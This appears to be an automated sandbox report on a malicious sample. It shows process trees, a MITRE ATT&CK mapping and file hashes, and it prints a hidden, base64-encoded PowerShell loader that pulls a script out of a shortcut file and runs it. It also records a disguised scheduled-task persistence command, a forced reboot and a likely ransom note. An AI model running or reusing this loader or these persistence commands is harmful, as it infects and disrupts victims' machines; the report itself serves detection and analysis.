  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1120 /prefetch:1
  2⤵
  PID:2056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6620 /prefetch:8
  2⤵
  PID:1380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7024 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1560
- C:\Users\Admin\Downloads\winrar-x64-710.exe
  "C:\Users\Admin\Downloads\winrar-x64-710.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1220
- C:\Users\Admin\Downloads\winrar-x64-710.exe
  "C:\Users\Admin\Downloads\winrar-x64-710.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7080 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  2⤵
  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:2660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6828 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:1
  2⤵
  PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:4432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7456 /prefetch:1
  2⤵
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7800 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:1
  2⤵
  PID:5876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1576

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\ad6d16ceb1f246d29609d0e3b7a8adcf /t 2064 /p 1220
1⤵
PID:2672

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1120
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Downloads\example.download"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:4852

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\tesasd.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3984
- C:\Users\Admin\AppData\Local\2v1.exe
  "C:\Users\Admin\AppData\Local\2v1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NVIDIA app" /tr "C:\ProgramData\NVIDIA app.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3892
- - C:\Windows\SYSTEM32\shutdown.exe
    shutdown.exe /f /r /t 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3452
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\tesasd.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1264
- C:\Users\Admin\AppData\Local\2v1.exe
  "C:\Users\Admin\AppData\Local\2v1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2376

C:\ProgramData\NVIDIA app.exe
"C:\ProgramData\NVIDIA app.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\example\New Microsoft Word Document.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5340

C:\ProgramData\NVIDIA app.exe
"C:\ProgramData\NVIDIA app.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5400

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39d0055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
471B

MD5
1250f1d274e3964d41da35fd55239c0f

SHA1
916c50b6ad9d8440b38b6f74cb567706c1a50dc5

SHA256
1bb7fe9d18a022939659f2387b81df3ca42da90f5c29fe704bd1c3776b9734ec

SHA512
26502415278a597fabeda0fdb1c38daf7c3ce5c13ef8750698b381653590344fb0b7b8c35a8cc288de0df120fb3f1e8c3c9cd07942b2b445514bb868897fc38c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
412B

MD5
9280e22ea8aa7e68e445862938deeb8c

SHA1
cb40089837a3c10e470329df4c4c8fe8f3cd6764

SHA256
25ff60b665070bb2f46c35e924c216ca1f30d8e7c4b295cf0df453b402bc2661

SHA512
c6de72e9c75054348eac2be595c142f7359927393fcc648a5c07f3220ad7fe01a4b39b97a03d5698d465dd26c4b207183e626779dac431e5a0af4a09db53a878

Download Submit
C:\Users\Admin\AppData\Local\2v1.exe

Filesize
39KB

MD5
4806c4d94f23b4aa628a7429255dde3e

SHA1
7588e35d34ed8184e34364faf72a3171b9a853ee

SHA256
38027f90b5fa2ddf926f00a1fc93e12e47dc76c0c55d4b75e28205eee31dc573

SHA512
45c16a1fc3985bab29910dc08cad2e10773ab8b59a776220c84698027c84be9a006a6ec311b3a3bcbb3e4c872664f317242783a602e06ef6032cdf9a14accdbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
25d7facb86265ce3e89835dd7b566491

SHA1
4db1197fadadd7742986efdc2ca76f89cef96942

SHA256
3d225a00da389fde7674a7eeb98e8572be2879252290ac00faa3a80ea671073f

SHA512
cbfc02ffc441edc20c72b35d20b15178a2173e2a1c54e3736f7ba6d058e1ac7a5c1b15798bf5b91ed3a8197430f0fe84aa3d75a8aba61b4f4dd85c1b3fe68bbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1ab6627d6da0724908361604b2b351b7

SHA1
d6e7960616dd38cd05633face9bb0bdd061e3211

SHA256
88a373cea6d7ad2daaee9168a0519f8a23ab9ec9cbceab97df4c8d39fe1544d0

SHA512
59903d7dd6da68cb4378eceb6e356d5861514b8365da747da4cd05615ec7c7a51c810cbac6a7a00256db1aeedad80ef71b6ff06bae61e1884e620cc4a45a2d33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
26KB

MD5
3db01f3289b7517e321aac642a91c7f3

SHA1
4d54518f6f94dbe3e4e0cd7cc0d13698272d197f

SHA256
45c8217bf1571647763788b5472b9621330f6b065ea3107e2c6340a60ccb73a1

SHA512
69e7726636a206b910a971c00bb9a2a79835e5f98bc588158f62484ae77cfed138f8741e68b6d69ce77830420bb87df46762c51862a80f01d04112a3561673cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

